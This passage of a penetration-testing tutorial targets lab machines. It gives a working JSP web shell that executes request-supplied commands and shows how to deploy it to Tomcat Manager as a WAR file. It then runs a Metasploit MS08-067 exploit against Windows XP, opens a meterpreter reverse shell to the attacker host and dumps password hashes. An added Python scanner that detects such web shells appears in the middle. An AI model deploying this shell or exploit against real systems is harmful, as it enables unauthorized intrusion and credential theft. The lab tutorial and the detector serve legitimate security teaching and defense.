<BODY>
Note: Against Windows you may need to prefix your command with cmd.exe /c
</br></br>
JSP Command:
<FORM METHOD="GET" NAME="myform" ACTION="">
  <INPUT TYPE="text" NAME="cmd">
  <INPUT TYPE="submit" VALUE="Execute">
</FORM>
<PRE>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</PRE>
</BODY>
</HTML>
[/js]

Then package the file using the jar command as follows:

[c]
jar -cvf cmd.war cmd_shell.jsp
[/c]

(Note: .war is the file type that the Apache Tomcat Manager accepts for deployment.)

Next, browse to the .war file and deploy it. As we can see, the /cmd path was added.

Click this path, then complete the path in the navigation bar by adding cmd_shell.jsp.

At this point we can type any Unix/Windows command, just as if we were working in a command prompt window.
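A WAR like cmd.war can be caught before or after deployment by scanning its JSPs for request input that flows into process execution. The following scanner is an added example, not part of the original tutorial; the sample archive is constructed in memory, and the file names other than cmd_shell.jsp, the size limit and the verdict strings are made up for illustration.

```python
import io
import re
import zipfile

HIGH = "request-controlled command execution"
REVIEW = "process execution (review)"
MAX_JSP_BYTES = 1_000_000   # do not inflate oversized archive members

# JSP scriptlets, expressions and directives, but not <%-- comments --%>.
SCRIPTLET = re.compile(r"<%(?!--)(.*?)%>", re.S)
# Runtime.getRuntime().exec(...) or new ProcessBuilder(...), capturing the arguments.
EXEC_CALL = re.compile(
    r"(?:Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec|new\s+ProcessBuilder)"
    r"\s*\((?P<args>[^;]*)\)\s*;", re.S)
# Direct reads of client-supplied data.
REQUEST_INPUT = re.compile(
    r"request\s*\.\s*get(?:Parameter|ParameterValues|Header|QueryString|"
    r"InputStream|Reader)\s*\(")
# Variables assigned from request data, e.g. String c = request.getParameter("c");
ASSIGN = re.compile(r"(\w+)\s*=\s*request\s*\.\s*get\w+\s*\(")


def scan_jsp(source):
    """Return HIGH, REVIEW or None for one JSP source text."""
    code = "\n".join(SCRIPTLET.findall(source))
    tainted = set(ASSIGN.findall(code))
    verdict = None
    for call in EXEC_CALL.finditer(code):
        args = call["args"]
        if REQUEST_INPUT.search(args) or any(
                re.search(r"\b%s\b" % re.escape(var), args) for var in tainted):
            return HIGH
        verdict = REVIEW    # spawns a process, but not from request data
    return verdict


def scan_war(war_bytes):
    """Map each flagged .jsp/.jspx member of a WAR archive to its verdict."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        for info in war.infolist():
            if not info.filename.lower().endswith((".jsp", ".jspx")):
                continue
            if info.file_size > MAX_JSP_BYTES:
                findings[info.filename] = "skipped: oversized"
                continue
            verdict = scan_jsp(war.read(info).decode("utf-8", "replace"))
            if verdict:
                findings[info.filename] = verdict
    return findings


def build_sample_war():
    """Constructed archive: one harmless page and three that spawn processes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as war:
        war.writestr("index.jsp",
                     "<html><body><%= new java.util.Date() %></body></html>")
        war.writestr("cmd_shell.jsp",
                     '<% if (request.getParameter("cmd") != null) {\n'
                     ' Process p = Runtime.getRuntime().exec('
                     'request.getParameter("cmd")); } %>')
        war.writestr("report.jsp",
                     '<% String f = request.getParameter("fmt");\n'
                     ' out.println(f); Runtime.getRuntime().exec("/usr/bin/uptime"); %>')
        war.writestr("tool.jsp",
                     '<% String c = request.getParameter("c");'
                     ' new ProcessBuilder(c).start(); %>')
    return buf.getvalue()


if __name__ == "__main__":
    for name, verdict in sorted(scan_war(build_sample_war()).items()):
        print(name, "->", verdict)
```

The same function can be pointed at the bytes of any .war file waiting in a deployment queue or already present under the server's webapps directory.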

Gathering Information - Windows XP Machine

We'll begin with the same basic scan as before, this time against our VM (Windows XP) machine at 192.168.56.103.

[c]
root@wizard32:~# nmap -p- 192.168.56.103

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:56 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00070s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 31.09 seconds
[/c]

Looking at the results, we can see that there are many open ports. Let's focus on port 445. Using nmap once more, we'll add a couple of parameters to find out a little more about this specific port.

[c]
root@wizard32:~# nmap -A -Pn -T4 192.168.56.103 -p 445

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:55 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00055s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WINDOWSX-C7B000, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4f:38:30 (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: windowsx-c7b000
|   NetBIOS computer name: WINDOWSX-C7B000
|   Workgroup: WORKGROUP
|_  System time: 2013-06-18 04:36:59 UTC+3

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.56.103

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds
[/c]

  • -A: Aggressive; enables many options at once, such as version detection and script scanning. Use with caution.
  • -T (0-5): Timing option; determines how aggressive you want the scan to be.
  • -Pn: Skips the ping request that is normally sent before scanning.
  • -p: Only scan the specified ports.

Identify network services – Exploit Vulnerable Backdoors

Reviewing the output closely, we can see that port 445/tcp runs an SMB server. We can identify the OS environment that the SMB server runs on by typing:

[c]
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.56.103
RHOSTS => 192.168.56.103
msf auxiliary(smb_version) > run

[*] 192.168.56.103:445 is running Windows XP Service Pack 2 (language: English) (name:WINDOWSX-C7B000) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]

As we can see, the SMB server runs on Windows XP SP2. So once more, using Metasploit, we will try to exploit it.

[c]
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.103
RHOST => 192.168.56.103
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.103   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:1079) at 2013-06-18 22:14:33 +0300

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WINDOWSX-C7B000
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4b96c75b8d843a7ae69de05670f84236:d9178fd3b70a6bb945b5f1b67c6bf645:::
IUSR_WINDOWSX-C7B000:1004:7a68662f527f18a87dfe407d970d780e:199fc7a3f00b00d8da81a66e4507e55b:::
IWAM_WINDOWSX-C7B000:1005:27ffb5fdfeafa462d92e514086f08077:954f0124f93780ce8d43ffcda157a567:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:603e6ae218ff6a77a3d7c9a519b93df7:::
windowsxp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shell
Process 1908 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name: WINDOWSX-C7B000
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 2 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: windowsxp
Registered Organization:
Product ID: 76487-640-8365391-23703
Original Install Date: 6/10/2013, 1:02:40 PM
System Up Time: 0 Days, 2 Hours, 4 Minutes, 1 Seconds
System Manufacturer: innotek GmbH
System Model: VirtualBox
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
    [01]: x86 Family 6 Model 58 Stepping 9 GenuineIntel ~2484 Mhz
BIOS Version: VBOX - 1
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 511 MB
Available Physical Memory: 370 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,009 MB
Virtual Memory: In Use: 39 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
    [01]: Q147222
NetWork Card(s): 1 NIC(s) Installed.
    [01]: AMD PCNET Family PCI Ethernet Adapter
        Connection Name: Local Area Connection
        DHCP Enabled: No
        IP address(es)
        [01]: 192.168.56.103
[/c]

Conclusion

There are many ways to enumerate and exploit vulnerable web apps and services. This tutorial describes the basic steps for gathering important information and exploiting the best-known vulnerable services in a couple of ways. The safest approach is to try every parameter in a virtual environment before running any of the above examples against real servers, and then only with access authorized by the admin.

Fotis Liatsis

Fotis Liatsis is an undergraduate at Technological Educational Institute of Larissa, department of Computer Science and Telecommunications. He is also a member and System/Network Administrator of Greek Student Security Team - CampSec. Fotis is an OWASP member of the Greek Student Chapter, System Administrator of Hackademic and also a member of the Digital Awareness and Reinforcement of Trust (D.A.R.T. NGO) team. His interests include Ethical Hacking, Penetration Testing, Security/vulnerability research and applied Cryptography methods.

He is a security enthusiast and Athcon fanatic. You can follow his Twitter (@liatsisfotis) or his blog for more information (http://www.liatsisfotis.com/)